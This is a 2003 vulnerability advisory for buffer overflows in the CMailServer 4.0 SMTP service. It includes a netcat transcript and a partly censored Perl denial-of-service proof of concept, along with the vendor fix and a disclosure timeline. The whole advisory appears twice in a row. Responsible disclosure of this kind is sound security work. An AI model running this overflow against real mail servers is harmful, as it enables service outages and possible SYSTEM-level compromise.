Dennis Rand
10/05/03, 19:50
Multiple Buffer Overflow Vulnerabilities
Found in CMailServer 4.0
http://www.youngzsoft.com
=20
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
CMailServer, a small and easy to administer email server software and =
web=20
mail server software, can help you build your own email server for=20
Win NT/2000/XP. It enables you to send and receive email across the=20
Internet or within your LAN. The ESMTP authentication, ASP form web=20
mail and multiple domain names are supported.=20
CMailServer offers an unlimited email users license at a reasonable=20
and affordable price compared to other email server software.=20
For those small to medium sized companies, CMailServer will be an=20
economic and effective solution to handle their e-mail management=20
requirements. CMailServer also is a web mail server software and=20
provides full web mail service. The web mail is based on ASP.=20
You can customize your web mail interface freely. Give it a try=20
and find out how easy it is to build an email server and web mail=20
server for your own business.
The problem is a Buffer Overflow in the SMTP protocol, within the=20
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
shutdown.
It is possible to actually overwrite the exception handler on the stack
allowing=20
A system compromise with code execution running as SYSTEM.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* ESMTP CMailServer 4.0.2003.03.27 SMTP Service
Immune systems:
* ESMTP CMailServer 4.0.2003.03.30 SMTP Service
-----[SEVERITY
High - An attacker is able to cause a DoS attack on the SMTP
protocol.
And we can actually overwrite the exception handler on the
stack=20
Allowing a system compromise with code execution running =
as
SYSTEM.
=20
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service
When a malicious attacker sends a large amount into the "MAIL FROM" and =
the
"RCPT TO"
The buffer will overflow. If the code was carefully crafted, attackers =
could
execute=20
Arbitrary command in system privilege.
The following transcript demonstrates a sample exploitation of the=20
Vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>
The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------
----------------------------- [Exploit Code] =
-----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the=20
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on =
the
stack allowing=20
# A system compromise with code execution running as SYSTEM.
#=20
#
# Ive censored some of the source code out. =3D)
#
# Solution:=20
# None at this time
#=20
#
use IO::Socket;
=20
$target =3D shift() || "warlab.dk";
my $port =3D 25;
my $Buffer =3D "A" x <CENSORED> ; #=20
my $sock =3D IO::Socket::INET->new (
PeerAddr =3D> $target,
PeerPort =3D> $port,
Proto =3D> 'tcp'
) || die "could not connect: $!";
my $banner =3D <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}
print $sock "HELO $target\r\n";
$resp =3D <$sock>;
print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp =3D <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
----------------------------- [Exploit Code] =
-----------------------------
-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks.=20
Earlier versions may be susceptible as well. To determine if a specific=20
implementation is vulnerable, experiment by following the above =
transcript.=20
-----[WORK AROUNDS
Upgrade as soon as possible to version -> ESMTP CMailServer =
4.0.2003.03.30
SMTP Service
or later.=20
The other workaround is to disable the SMTP service but that is not fun.
-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer
-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net=20
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <der@infowarfare.dk> =
Dennis
Rand
-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of =
any
kind.=20
In no event shall we be liable for any damages whatsoever including =
direct,
indirect,=20
incidental, consequential, loss of business profits or special damages.=20
Found in CMailServer 4.0
http://www.youngzsoft.com
=20
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
CMailServer, a small and easy to administer email server software and =
web=20
mail server software, can help you build your own email server for=20
Win NT/2000/XP. It enables you to send and receive email across the=20
Internet or within your LAN. The ESMTP authentication, ASP form web=20
mail and multiple domain names are supported.=20
CMailServer offers an unlimited email users license at a reasonable=20
and affordable price compared to other email server software.=20
For those small to medium sized companies, CMailServer will be an=20
economic and effective solution to handle their e-mail management=20
requirements. CMailServer also is a web mail server software and=20
provides full web mail service. The web mail is based on ASP.=20
You can customize your web mail interface freely. Give it a try=20
and find out how easy it is to build an email server and web mail=20
server for your own business.
The problem is a Buffer Overflow in the SMTP protocol, within the=20
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
shutdown.
It is possible to actually overwrite the exception handler on the stack
allowing=20
A system compromise with code execution running as SYSTEM.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* ESMTP CMailServer 4.0.2003.03.27 SMTP Service
Immune systems:
* ESMTP CMailServer 4.0.2003.03.30 SMTP Service
-----[SEVERITY
High - An attacker is able to cause a DoS attack on the SMTP
protocol.
And we can actually overwrite the exception handler on the
stack=20
Allowing a system compromise with code execution running =
as
SYSTEM.
=20
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service
When a malicious attacker sends a large amount into the "MAIL FROM" and =
the
"RCPT TO"
The buffer will overflow. If the code was carefully crafted, attackers =
could
execute=20
Arbitrary command in system privilege.
The following transcript demonstrates a sample exploitation of the=20
Vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>
The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------
----------------------------- [Exploit Code] =
-----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the=20
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on =
the
stack allowing=20
# A system compromise with code execution running as SYSTEM.
#=20
#
# Ive censored some of the source code out. =3D)
#
# Solution:=20
# None at this time
#=20
#
use IO::Socket;
=20
$target =3D shift() || "warlab.dk";
my $port =3D 25;
my $Buffer =3D "A" x <CENSORED> ; #=20
my $sock =3D IO::Socket::INET->new (
PeerAddr =3D> $target,
PeerPort =3D> $port,
Proto =3D> 'tcp'
) || die "could not connect: $!";
my $banner =3D <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}
print $sock "HELO $target\r\n";
$resp =3D <$sock>;
print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp =3D <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
----------------------------- [Exploit Code] =
-----------------------------
-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks.=20
Earlier versions may be susceptible as well. To determine if a specific=20
implementation is vulnerable, experiment by following the above =
transcript.=20
-----[WORK AROUNDS
Upgrade as soon as possible to version -> ESMTP CMailServer =
4.0.2003.03.30
SMTP Service
or later.=20
The other workaround is to disable the SMTP service but that is not fun.
-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer
-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net=20
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <der@infowarfare.dk> =
Dennis
Rand
-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of =
any
kind.=20
In no event shall we be liable for any damages whatsoever including =
direct,
indirect,=20
incidental, consequential, loss of business profits or special damages.=20